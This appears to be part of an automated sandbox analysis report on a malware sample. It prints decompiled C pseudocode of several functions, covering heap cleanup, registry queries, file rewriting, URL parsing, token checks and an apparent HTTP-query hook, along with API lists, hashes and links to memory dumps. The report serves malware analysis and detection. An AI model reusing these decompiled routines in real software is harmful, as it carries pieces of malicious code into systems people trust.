0x0040d658
0x0040d7dd
0x0040d7dd
0x00000000
0x0040d7dd
0x0040d65e
0x0040d662
0x0040d665
0x0040d66a
0x0040d7c9
0x0040d7cb
0x0040d7d7
0x0040d7d7
0x00000000
0x0040d7cb
0x0040d674
0x0040d67b
0x0040d7c5
0x0040d7c5
0x00000000
0x0040d7c5
0x0040d681
0x0040d698
0x0040d69b
0x0040d6a3
0x0040d6a6
0x0040d6b0
0x00000000
0x00000000
0x0040d6b6
0x0040d6b9
0x0040d6be
0x0040d6c4
0x0040d6cb
0x0040d6dc
0x0040d6df
0x0040d6e6
0x00000000
0x00000000
0x0040d6ec
0x0040d6f1
0x0040d70a
0x0040d70a
0x0040d70f
0x0040d728
0x0040d734
0x0040d738
0x00000000
0x0040d73e
0x0040d742
0x0040d74b
0x0040d75b
0x0040d76c
0x0040d7b1
0x0040d7b6
0x0040d7bd
0x0040d76e
0x0040d77c
0x0040d781
0x0040d787
0x0040d794
0x0040d794
0x0040d79c
0x0040d7a2
0x0040d7a9
0x0040d7a9
0x00000000
0x0040d76c
0x0040d738
0x0040d71b
0x0040d720
0x0040d722
0x00000000
0x00000000
0x00000000
0x0040d722
0x0040d6fd
0x0040d704
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040C730: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C74E

HeapFree.KERNEL32(?,00000000,00000000,0000001E), ref: 0040D7D7

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,00000001,8793AEF2,00000002,00002723,00020000,?,?,00000000,?,00000004,0000001E), ref: 0040D7A2
CloseHandle.KERNEL32(00000000), ref: 0040D7A9

Part of subcall function 004189F0: HeapFree.KERNEL32(?,00000000,00000000,?,00020000,00000000,00000000,0000FDE9,00000001,?,00000000,00000001), ref: 00418A5C

ReleaseMutex.KERNEL32(00000000,?,00000001,8793AEF2,00000002,00002723,00020000,?,?,00000000,?,00000004,0000001E), ref: 0040D7B6
CloseHandle.KERNEL32(00000000), ref: 0040D7BD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CloseHandleMutexRelease$Alloc
String ID:
API String ID: 2428026407-0
Opcode ID: 7a89f029836b77a4e8a4b039ebd3c50b793626a1571464e4a39b2e9ba6c60d1e
Instruction ID: 1ec435df002ac43dc60ac7b5a76e97f5436ffd38f1a62295c30a9573fc243218
Opcode Fuzzy Hash: 7a89f029836b77a4e8a4b039ebd3c50b793626a1571464e4a39b2e9ba6c60d1e
Instruction Fuzzy Hash: CF41D0715043029FC710DF65E984EABB7E8AF84704F00492EB945772D2DB38EC49CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF30, Relevance: 7.6, APIs: 6, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EF30(void* __edi, void* __ebp, void* __eflags, void* _a4, WCHAR* _a8, char _a12) {
				void* _v4;
				long _v8;
				void* _v12;
				void* __esi;
				void* _t20;
				void* _t31;
				void* _t35;
				void* _t36;
				void* _t43;
				void* _t49;
				void* _t50;

				_t35 = 0;
				if(E00418040(0,  *0x42e954,  &_v12) == 0) {
					return 0;
				} else {
					_push(__edi);
					if(_a4 != 0) {
						_t43 = _v12;
						_t52 = _v8;
						if(_v8 != 0) {
							_t49 = HeapAlloc( *0x42e6d4, 0,  &_a4);
							if(_t49 != 0) {
								E00410820(_t49, _t43, _t52);
							}
						} else {
							_t49 = 0;
						}
						if(_t43 != 0) {
							VirtualFree(_t43, 0, 0x8000);
						}
						_t20 = _v4;
						if(_t20 != 0) {
							CloseHandle(_t20);
						}
						if(_t49 != 0) {
							if(E0041D5A0(_t43, _t49, _t52, _a4) != 0) {
								_t35 = E0040EE70(_a8, _t49, _t52, _a12);
							}
							HeapFree( *0x42e6d4, 0, _t49);
						}
						return _t35;
					} else {
						_t50 = _v12;
						_t36 = E0040EE70(_a8, _t50, _v8, _a12);
						if(_t50 != 0) {
							VirtualFree(_t50, 0, 0x8000);
						}
						_t31 = _v4;
						if(_t31 != 0) {
							CloseHandle(_t31);
						}
						return _t36;
					}
				}
			}

0x0040ef41
0x0040ef4a
0x0040f038
0x0040ef50
0x0040ef55
0x0040ef56
0x0040ef9e
0x0040efa3
0x0040efa9
0x0040efc1
0x0040efc5
0x0040efca
0x0040efca
0x0040efab
0x0040efab
0x0040efab
0x0040efd1
0x0040efdb
0x0040efdb
0x0040efe1
0x0040efe7
0x0040efea
0x0040efea
0x0040eff2
0x0040f002
0x0040f014
0x0040f014
0x0040f01f
0x0040f01f
0x0040f02e
0x0040ef58
0x0040ef60
0x0040ef70
0x0040ef74
0x0040ef7e
0x0040ef7e
0x0040ef84
0x0040ef8a
0x0040ef8d
0x0040ef8d
0x0040ef9b
0x0040ef9b
0x0040ef56

APIs

Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 0040EF7E
CloseHandle.KERNEL32(?,?,?,?), ref: 0040EF8D
HeapAlloc.KERNEL32(?,00000000,?), ref: 0040EFBB
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040EFDB
CloseHandle.KERNEL32(00000000), ref: 0040EFEA
HeapFree.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0040F01F

Part of subcall function 0040EE70: SetFileAttributesW.KERNEL32(?,00000020), ref: 0040EE84
Part of subcall function 0040EE70: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040EE9B
Part of subcall function 0040EE70: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040EEC2
Part of subcall function 0040EE70: CloseHandle.KERNEL32(00000000), ref: 0040EECF
Part of subcall function 0040EE70: SetFileAttributesW.KERNEL32(?,00000080), ref: 0040EEE0
Part of subcall function 0040EE70: DeleteFileW.KERNEL32(?), ref: 0040EEE3
Part of subcall function 0040EE70: Sleep.KERNEL32(-00001388), ref: 0040EF08

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseFreeHandle$AttributesCreateHeapVirtual$AllocDeleteSizeSleepWrite
String ID:
API String ID: 2978562043-0
Opcode ID: 9cbbdf3198630f75f4a3e8660db6f861a18dd69290e957e1b24b5a5c89266cf1
Instruction ID: 751bdc1b12cec48ed9f16c833f76b647033e23c2bd8c8b87e90c97417d88d833
Opcode Fuzzy Hash: 9cbbdf3198630f75f4a3e8660db6f861a18dd69290e957e1b24b5a5c89266cf1
Instruction Fuzzy Hash: 6431D8326452117BC220DB12ED04FAB779CEB85714F14093AFD40B7351C639ED09C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00416420, Relevance: 7.6, APIs: 5, Instructions: 101
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416420(void* __eax, int _a4, short* _a8, void* _a12) {
				int _v4;
				void* __esi;
				short* _t21;
				signed int _t33;
				unsigned int _t34;
				signed int _t36;
				WCHAR* _t37;
				void* _t47;
				WCHAR* _t49;
				long _t50;

				_t50 = _a12;
				_t49 = _t37;
				_v4 = _t50 + _t50;
				_a12 = __eax;
				_t34 = _t33 | 0xffffffff;
				_t21 = RegOpenKeyExW(__eax, _a4, 0, 1,  &_a12);
				if(_t21 == 0) {
					RegQueryValueExW(_a12, _a8, 0,  &_a4, _t49,  &_v4);
					_t34 =  ==  ? _v4 : _t34;
					_t21 = RegCloseKey(_a12);
				}
				if(_t34 == 0xffffffff || (_t34 & 0x00000001) != 0) {
					L20:
					return _t21 | 0xffffffff;
				} else {
					_t21 = _a4;
					if(_t21 == 1 || _t21 == 2) {
						if(_t34 != 0) {
							_t36 = (_t34 >> 1) - 1;
							if(_t49[_t36] == 0) {
								L11:
								if(_t36 > 2 && _t21 == 2) {
									_t47 = E00410D20(_t49);
									if(_t47 == 0 || ExpandEnvironmentStringsW(_t47, _t49, _t50) == 0) {
										_t36 = _t36 | 0xffffffff;
									}
									if(_t47 != 0) {
										HeapFree( *0x42e6d4, 0, _t47);
									}
								}
								return _t36;
							} else {
								_t36 = _t36 + 1;
								if(_t50 <= _t36) {
									goto L20;
								} else {
									_t49[_t36] = 0;
									goto L11;
								}
							}
						} else {
							 *_t49 = 0;
							return _t34;
						}
					} else {
						goto L20;
					}
				}
			}

0x00416423
0x0041642d
0x00416435
0x00416441
0x00416445
0x00416448
0x00416450
0x00416469
0x00416475
0x0041647b
0x0041647b
0x00416484
0x00416507
0x0041650c
0x0041648b
0x0041648b
0x00416492
0x0041649b
0x004164ad
0x004164b3
0x004164c0
0x004164c3
0x004164d2
0x004164d6
0x004164e5
0x004164e5
0x004164ea
0x004164f5
0x004164f5
0x004164fb
0x00416502
0x004164b5
0x004164b5
0x004164b8
0x00000000
0x004164ba
0x004164bc
0x00000000
0x004164bc
0x004164b8
0x0041649d
0x0041649f
0x004164a8
0x004164a8
0x00000000
0x00000000
0x00000000
0x00416492

APIs

RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnvironmentExpandFreeHeapOpenQueryStringsValue
String ID:
API String ID: 19685416-0
Opcode ID: 80c49f4260ad4102f3e1327bc1c7fa865722f8300ce82cbbbb9a5975e2239b81
Instruction ID: 6d6087f00cdb0f69a1774fa8b175932884c132cc203557ebf9c7bcbe61c88e50
Opcode Fuzzy Hash: 80c49f4260ad4102f3e1327bc1c7fa865722f8300ce82cbbbb9a5975e2239b81
Instruction Fuzzy Hash: F531D6722043016ED324CF68EC84FABB3A9EF94724F214A2EF551C22A0E775E881C359

Uniqueness

Uniqueness Score: -1.00%

Function 00417560, Relevance: 7.6, APIs: 5, Instructions: 91
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417560(char* __edx) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v44;
				void* __esi;
				void* _t16;
				void* _t19;
				void* _t27;
				void _t28;
				void* _t33;
				intOrPtr _t34;
				void* _t35;
				void* _t36;

				_t34 = 0;
				_v24 = 0;
				if(E004173A0( &_v20, __edx) == 0) {
					L20:
					return _t34;
				} else {
					_t36 = _v16;
					 *((char*)(_v12 + _t36)) = 0;
					_t33 = _t36;
					do {
						_t28 =  *_t33;
						_t33 = _t33 + 1;
					} while (_t28 != 0);
					while(1) {
						_t33 = _t33 - 1;
						if(_t33 == _t36) {
							break;
						}
						if( *_t33 != 0x2f) {
							continue;
						}
						L7:
						if( *(_t33 + 1) == 0) {
							L16:
							_t16 = _v20;
							if(_t16 != 0) {
								HeapFree( *0x42e6d4, 0, _t16);
							}
							if(_t36 != 0) {
								HeapFree( *0x42e6d4, 0, _t36);
							}
							goto L20;
						}
						_t27 = 0;
						if( *_t33 == 0) {
							L10:
							_t8 = _t27 + 1; // 0x2
							_t19 = _t8;
							if(_t19 != 0) {
								_t35 = HeapAlloc( *0x42e6d4, 8, _t19 + 4);
								if(_t35 != 0) {
									E00410820(_t35, _t33, _t27);
									if(UrlUnescapeA(_t35, 0, 0, 0x100000) == 0) {
										_v44 = E00410AA0(_t35, 0xfde9, 0xffffffff);
									}
									HeapFree( *0x42e6d4, 0, _t35);
								}
								_t34 = _v24;
							}
							goto L16;
						} else {
							goto L9;
						}
						do {
							L9:
							_t27 = _t27 + 1;
						} while ( *((char*)(_t27 + _t33)) != 0);
						goto L10;
					}
					if( *_t33 != 0x2f) {
						goto L16;
					}
					goto L7;
				}
			}

0x00417566
0x0041756d
0x00417578
0x00417647
0x0041764f
0x0041757e
0x0041757e
0x00417586
0x0041758a
0x00417590
0x00417590
0x00417592
0x00417593
0x00417597
0x00417597
0x0041759a
0x00000000
0x00000000
0x0041759f
0x00000000
0x00000000
0x004175a8
0x004175ac
0x0041761a
0x0041761a
0x00417620
0x0041762c
0x0041762c
0x00417634
0x00417640
0x00417640
0x00000000
0x00417634
0x004175ae
0x004175b2
0x004175bb
0x004175bb
0x004175bb
0x004175c0
0x004175d5
0x004175d9
0x004175de
0x004175f5
0x00417603
0x00417603
0x00417610
0x00417610
0x00417616
0x00417616
0x00000000
0x00000000
0x00000000
0x00000000
0x004175b4
0x004175b4
0x004175b4
0x004175b5
0x00000000
0x004175b4
0x004175a6
0x00000000
0x00000000
0x00000000
0x004175a6

APIs

Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7

HeapAlloc.KERNEL32(?,00000008,-00000003), ref: 004175CF
UrlUnescapeA.SHLWAPI(00000000,00000000,00000000,00100000,00000000,?,00000000), ref: 004175ED
HeapFree.KERNEL32(?,00000000,00000000), ref: 00417610
HeapFree.KERNEL32(?,00000000,?), ref: 0041762C
HeapFree.KERNEL32(?,00000000,?), ref: 00417640

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AllocCrackInternetUnescape
String ID:
API String ID: 3742444136-0
Opcode ID: 2e225a74d13c428d7b25b73b4921e3deb01bc62d105f78218cdc73ef77973636
Instruction ID: 8b2c4135e85eb0d66e268d6d1fc0aa0330de5d8081533fe2f3ff8e2ac169aef2
Opcode Fuzzy Hash: 2e225a74d13c428d7b25b73b4921e3deb01bc62d105f78218cdc73ef77973636
Instruction Fuzzy Hash: CA2126746083426BD7309F25DC44FAB7BB8AB95760F54042AF940A7392D778DC81C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00425CF0, Relevance: 7.6, APIs: 6, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425CF0(signed int __eax, void* _a4) {
				void* _t10;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				signed int _t24;
				void** _t31;
				void* _t33;

				_t10 = __eax;
				_t33 = _a4;
				_t24 = __eax;
				if(__eax != 0) {
					_t31 = _t33 + 8 + (__eax * 8 - __eax) * 4;
					do {
						_t15 =  *(_t31 - 0x20);
						_t31 = _t31 - 0x1c;
						_t24 = _t24 - 1;
						if(_t15 != 0) {
							HeapFree( *0x42e6d4, 0, _t15);
						}
						_t16 =  *_t31;
						if(_t16 != 0) {
							HeapFree( *0x42e6d4, 0, _t16);
						}
						_t17 = _t31[1];
						if(_t17 != 0) {
							HeapFree( *0x42e6d4, 0, _t17);
						}
						_t18 = _t31[2];
						if(_t18 != 0) {
							HeapFree( *0x42e6d4, 0, _t18);
						}
						_t10 = _t31[3];
						if(_t10 != 0) {
							_t10 = HeapFree( *0x42e6d4, 0, _t10);
						}
					} while (_t24 != 0);
				}
				if(_t33 != 0) {
					return HeapFree( *0x42e6d4, 0, _t33);
				}
				return _t10;
			}

0x00425cf0
0x00425cf2
0x00425cf6
0x00425d01
0x00425d0d
0x00425d11
0x00425d11
0x00425d14
0x00425d17
0x00425d1a
0x00425d26
0x00425d26
0x00425d28
0x00425d2c
0x00425d38
0x00425d38
0x00425d3a
0x00425d3f
0x00425d4a
0x00425d4a
0x00425d4c
0x00425d51
0x00425d5d
0x00425d5d
0x00425d5f
0x00425d64
0x00425d70
0x00425d70
0x00425d72
0x00425d76
0x00425d79
0x00000000
0x00425d84
0x00425d89

APIs

HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D26
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D38
HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D4A
HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D5D
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D70
HeapFree.KERNEL32(?,00000000,?,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D84

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 49678c1f73140d94d630d62a30f4ee9f60220b3c6f3a7be05368c36227b1f685
Instruction ID: e55e8997f0d425893a32fcdebfb004b6fda2ca774595fddcd426d56432ce9166
Opcode Fuzzy Hash: 49678c1f73140d94d630d62a30f4ee9f60220b3c6f3a7be05368c36227b1f685
Instruction Fuzzy Hash: BF11E2713107156BE624DFAAFD84F27B39CEB64750FD18539AA00D7660DA74EC018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00416680, Relevance: 7.6, APIs: 5, Instructions: 67
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416680(short* __ebx, int* __edi, void** _a4, void** _a8) {
				int* _v4;
				int _v8;
				int _t18;
				void* _t19;
				void* _t38;

				_v4 = 0xffffffff;
				_v8 = 0;
				if(RegQueryValueExW( *_a4, __ebx, 0, __edi, 0,  &_v8) == 0) {
					_t18 = _v8;
					if(_t18 != 0) {
						_t19 = _t18 + 4;
						if(_t19 != 0) {
							_t38 = HeapAlloc( *0x42e6d4, 8, _t19 + 4);
							if(_t38 != 0) {
								if(RegQueryValueExW( *_a4, __ebx, 0, __edi, _t38,  &_v8) != 0) {
									HeapFree( *0x42e6d4, 0, _t38);
								} else {
									 *_a8 = _t38;
									_v4 = _v8;
								}
							}
						}
					} else {
						_v4 = 0;
					}
				}
				RegCloseKey( *_a4);
				return _v4;
			}

0x0041669d
0x004166a5
0x004166ad
0x004166af
0x004166b5
0x004166bd
0x004166c2
0x004166d6
0x004166da
0x004166f1
0x0041670c
0x004166f3
0x004166fb
0x004166fd
0x004166fd
0x004166f1
0x004166da
0x004166b7
0x004166b7
0x004166b7
0x004166b5
0x00416719
0x00416728

APIs

RegQueryValueExW.ADVAPI32 ref: 004166A9
HeapAlloc.KERNEL32(?,00000008,?), ref: 004166D0
RegQueryValueExW.ADVAPI32(00000000,0042E704,00000000,80000001,00000000,?), ref: 004166ED
RegCloseKey.ADVAPI32 ref: 00416719

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$AllocCloseHeap
String ID:
API String ID: 2375073885-0
Opcode ID: 1d8648a001cd47a19181686dbc7cb078f1c5a34786bbb23267eeb518dfd8a84d
Instruction ID: 4ebefba520f494b2b0d91e2f6570a26fe88df0a4ec3abdf12de87c73d0760690
Opcode Fuzzy Hash: 1d8648a001cd47a19181686dbc7cb078f1c5a34786bbb23267eeb518dfd8a84d
Instruction Fuzzy Hash: 2B117FB5604311ABC220DF55DC44E5BBBA8EB99764F10852AF8A4D7350D734EC80CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00413A40, Relevance: 7.6, APIs: 6, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413A40(void* __esi) {
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t32;

				_t32 = __esi;
				_t13 =  *(__esi + 0x5c);
				if(_t13 != 0) {
					HeapFree( *0x42e6d4, 0, _t13);
				}
				_t14 =  *(_t32 + 0x58);
				 *((intOrPtr*)(_t32 + 0x5c)) = 0;
				if(_t14 != 0) {
					HeapFree( *0x42e6d4, 0, _t14);
				}
				_t15 =  *(_t32 + 0x54);
				 *(_t32 + 0x58) = 0;
				if(_t15 != 0) {
					HeapFree( *0x42e6d4, 0, _t15);
				}
				_t16 =  *(_t32 + 0x50);
				 *(_t32 + 0x54) = 0;
				if(_t16 != 0) {
					HeapFree( *0x42e6d4, 0, _t16);
				}
				_t17 =  *(_t32 + 0x4c);
				 *(_t32 + 0x50) = 0;
				if(_t17 != 0) {
					HeapFree( *0x42e6d4, 0, _t17);
				}
				_t18 =  *(_t32 + 0x48);
				 *(_t32 + 0x4c) = 0;
				if(_t18 != 0) {
					_t18 = HeapFree( *0x42e6d4, 0, _t18);
				}
				 *(_t32 + 0x48) = 0;
				return _t18;
			}

0x00413a40
0x00413a40
0x00413a4f
0x00413a59
0x00413a59
0x00413a5b
0x00413a5e
0x00413a63
0x00413a6e
0x00413a6e
0x00413a70
0x00413a73
0x00413a78
0x00413a83
0x00413a83
0x00413a85
0x00413a88
0x00413a8d
0x00413a97
0x00413a97
0x00413a99
0x00413a9c
0x00413aa1
0x00413aac
0x00413aac
0x00413aae
0x00413ab1
0x00413ab6
0x00413ac1
0x00413ac1
0x00413ac4
0x00413ac8

APIs

HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A59
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A6E
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A83
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A97
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413AAC
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413AC1

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 84513611c1a9449b49a2b9fc2d5e8fc9891ecc95033e354dff38ada5948733e6
Instruction ID: d9791ccf93b3e2a4d092388a74f35a5038ba703d4976d5e208127d939e7af564
Opcode Fuzzy Hash: 84513611c1a9449b49a2b9fc2d5e8fc9891ecc95033e354dff38ada5948733e6
Instruction Fuzzy Hash: B6119AB5600754AFD724DFAADDC0C27B3ECEBA4249390483EE682C3A20C674EC458B24

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1A0, Relevance: 7.6, APIs: 5, Instructions: 57
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C1A0(void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
				signed int _t23;
				void* _t24;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr _t29;
				intOrPtr* _t32;
				void* _t35;

				if(WaitForSingleObject( *0x42edbc, 0) == 0) {
					_t35 = _a4;
					L14:
					return HttpQueryInfoA(_t35, _a8, _a12, _a16, _a20);
				}
				EnterCriticalSection(0x42d3ec);
				_t35 = _a4;
				if(_t35 == 0) {
					L12:
					LeaveCriticalSection(0x42d3ec);
					goto L14;
				}
				_t29 =  *0x42d408; // 0x0
				_t23 = 0;
				if(_t29 == 0) {
					goto L12;
				}
				_t32 =  *0x42d404; // 0x0
				_t26 = _t32;
				while( *_t26 != _t35) {
					_t23 = _t23 + 1;
					_t26 = _t26 + 0x24;
					if(_t23 < _t29) {
						continue;
					}
					LeaveCriticalSection(0x42d3ec);
					goto L14;
				}
				if(_t23 != 0xffffffff) {
					_t27 = _t23 + _t23 * 8;
					_t24 = _t32 + _t27 * 4;
					if( *((intOrPtr*)(_t32 + 0x10 + _t27 * 4)) == 1 && ( *( *(_t24 + 0xc)) & 0x00000003) != 0) {
						_t35 =  *(_t24 + 0x20);
					}
				}
				goto L12;
			}

0x0040c1b1
0x0040c225
0x0040c229
0x0040c245
0x0040c245
0x0040c1b8
0x0040c1be
0x0040c1c4
0x0040c218
0x0040c21d
0x00000000
0x0040c21d
0x0040c1c6
0x0040c1cc
0x0040c1d0
0x00000000
0x00000000
0x0040c1d3
0x0040c1d9
0x0040c1e0
0x0040c1e4
0x0040c1e5
0x0040c1ea
0x00000000
0x00000000
0x0040c1f2
0x00000000
0x0040c1f2
0x0040c1fd
0x0040c1ff
0x0040c207
0x0040c20a
0x0040c214
0x0040c214
0x0040c20a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C1A9
EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040C1B8
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C1F2
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C21D
HttpQueryInfoA.WININET(?,?,?,?,?), ref: 0040C23E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterHttpInfoObjectQuerySingleWait
String ID:
API String ID: 1835780783-0
Opcode ID: f3c8711330da3ff3d6dfb127b4fcc98089e90065c21655d5ec3ab518b915566f
Instruction ID: 1f2fdd81bb878d641edc389b1b94d291beade0a509c9ab471e1fdea1d043c2a5
Opcode Fuzzy Hash: f3c8711330da3ff3d6dfb127b4fcc98089e90065c21655d5ec3ab518b915566f
Instruction Fuzzy Hash: 4E119330A00211DBC715DB94E884E6B77A4FBC5750B5947AEF801F72E0C734AC42CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00415650, Relevance: 7.6, APIs: 5, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415650(void* __edi) {
				long _v4;
				long _v8;
				long _t9;
				void* _t21;

				if(GetTokenInformation(__edi, 1, 0, 0,  &_v4) != 0 || GetLastError() != 0x7a) {
					L7:
					return 0;
				} else {
					_t9 = _v8;
					if(_t9 == 0) {
						goto L7;
					} else {
						_t21 = HeapAlloc( *0x42e6d4, 8, _t9 + 4);
						if(_t21 == 0) {
							goto L7;
						} else {
							if(GetTokenInformation(__edi, 1, _t21, _v8,  &_v8) == 0) {
								HeapFree( *0x42e6d4, 0, _t21);
								goto L7;
							} else {
								return _t21;
							}
						}
					}
				}
			}

0x00415669
0x004156c2
0x004156c6
0x00415676
0x00415676
0x0041567c
0x00000000
0x0041567e
0x00415691
0x00415695
0x00000000
0x00415697
0x004156a9
0x004156bb
0x00000000
0x004156ab
0x004156b0
0x004156b0
0x004156a9
0x00415695
0x0041567c

APIs

GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,0042E908,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 00415665
GetLastError.KERNEL32(?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041566B
HeapAlloc.KERNEL32(?,00000008,-00000004,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041568B
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156A5
HeapFree.KERNEL32(?,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156BB

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
